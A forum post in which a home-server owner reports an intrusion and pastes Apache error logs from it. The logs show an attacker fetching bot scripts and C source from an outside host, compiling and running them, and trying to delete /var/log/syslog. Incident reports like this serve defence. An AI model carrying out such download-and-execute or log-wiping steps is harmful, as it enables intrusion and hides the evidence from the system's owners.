I have been attacked and don't know why.

Got problems with your B2 or B3? Share and get helped!
Post Reply
RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 09:45

By a series of coincidences, I noticed that a crontab file was created yesterday for my www-data user (it was quite lucky, it could have been weeks before I noticed). The crontab is identical to the one mentioned here:

http://security.stackexchange.com/quest ... es-it-work

I have removed the crontab file, purged the /tmp directory and rebooted the server. I've checked every other file modified on the server in the last two days and I am fairly sure I've purged the threat. I've also blacklisted stablehost.us on my network. But how did it happen?

The IP address it came from is owned by HP and I have emailed abuse@hp.com. Here are the related entries from my apache error/access logs:

error.log:

Code: Select all

[Wed Oct 30 14:09:26 2013] [error] [client 15.185.117.126] --2013-10-30 14:09:26--  http://stablehost.us/bots/regular.bot
[Wed Oct 30 14:09:26 2013] [error] [client 15.185.117.126] Resolving stablehost.us...
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] 93.114.170.129
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80...
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] connected.
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response...
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] 200 OK
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Length: 510 [text/plain]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Saving to: `/tmp/sh'
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]      0K                                                       100% 18.1M=0s
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] 2013-10-30 14:09:27 (18.1 MB/s) - `/tmp/sh' saved [510/510]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] ./.a: 1:
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Syntax error: "(" unexpected
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] --2013-10-30 14:09:27--  http://stablehost.us/bots/lol.c
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Resolving stablehost.us...
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] 93.114.170.129
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80...
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] connected.
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response...
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] 200 OK
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] Length:
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] 38100
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]  (37K)
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]  [text/plain]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] Saving to: `a.c'
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]      0K
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] 100%
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]   305K
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] =0.1s
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] 2013-10-30 14:09:28 (305 KB/s) - `a.c' saved [38100/38100]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:29 2013] [error] [client 15.185.117.126] a.c:169: warning: conflicting types for built-in function 'pow'
[Wed Oct 30 14:09:29 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] rm:
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] cannot remove `/var/log/syslog'
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] touch:
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] cannot touch `/var/log/syslog'
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chmod:
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] changing permissions of `/var/log/syslog'
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] : Operation not permitted
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chattr
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] :
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] while reading flags on /var/log/syslog
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Warning:
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Failed to create the file .a: Text file busy
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] \r
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 4
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 2
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 6
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 4
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 2
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 4
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]    0     0   8456      0  0:00:03 --:--:--  0:00:03 17803
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] curl: (23) Failed writing body (0 != 1175)
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] rm:
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] cannot remove `/var/log/syslog'
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] touch:
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] cannot touch `/var/log/syslog'
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chmod:
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] changing permissions of `/var/log/syslog'
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] : Operation not permitted
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chattr
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] :
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] while reading flags on /var/log/syslog
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] --2013-10-30 14:09:31--  http://stablehost.us/botsb
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Resolving stablehost.us...
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 93.114.170.129
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80...
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] connected.
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response...
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 404 Not Found
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 2013-10-30 14:09:31 ERROR 404: Not Found.
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] \r
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 8
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 4
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 2
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]   0   625k      0  0:00:01 --:--:--  0:00:01  701k
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] \r
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 8
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 8
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] 0   663k      0  0:00:01  0:00:01 --:--:--  708k
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] ./.b: 1:
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] \x7fELF\x01\x01\x01\x03\x02\x03\x01\xe0\x81\x04\b48\xbd: not found
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] ./.b: 2:
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] Syntax error: "(" unexpected
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:14:33 2013] [warn] [client 15.185.117.126] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Wed Oct 30 14:14:33 2013] [error] [client 15.185.117.126] Script timed out before returning headers: php
[Wed Oct 30 14:19:33 2013] [warn] [client 15.185.117.126] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] --2013-10-30 14:19:33--  http://stablehost.us/bots/regular.bot
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] Resolving stablehost.us...
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] 93.114.170.129
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80...
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] connected.
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response...
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 200 OK
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Length:
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 510
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]  [text/plain]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Saving to: `/tmp/sh'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]      0K
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]                               100% 15.1M=0s
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 2013-10-30 14:19:34 (15.1 MB/s) - `/tmp/sh' saved [510/510]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .a: Text file busy
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] rm:
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] cannot remove `/var/log/syslog'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] touch:
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] cannot touch `/var/log/syslog'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] chmod:
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] changing permissions of `/var/log/syslog'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] : Operation not permitted
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] chattr
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] :
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Permission denied
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] while reading flags on /var/log/syslog
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] --2013-10-30 14:19:34--  http://stablehost.us/bots/lol.c
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Resolving stablehost.us...
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 93.114.170.129
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80...
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] connected.
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response...
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 200 OK
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Length:
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 38100
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]  (37K)
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]  [text/plain]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Saving to: `a.c'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]      0K
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
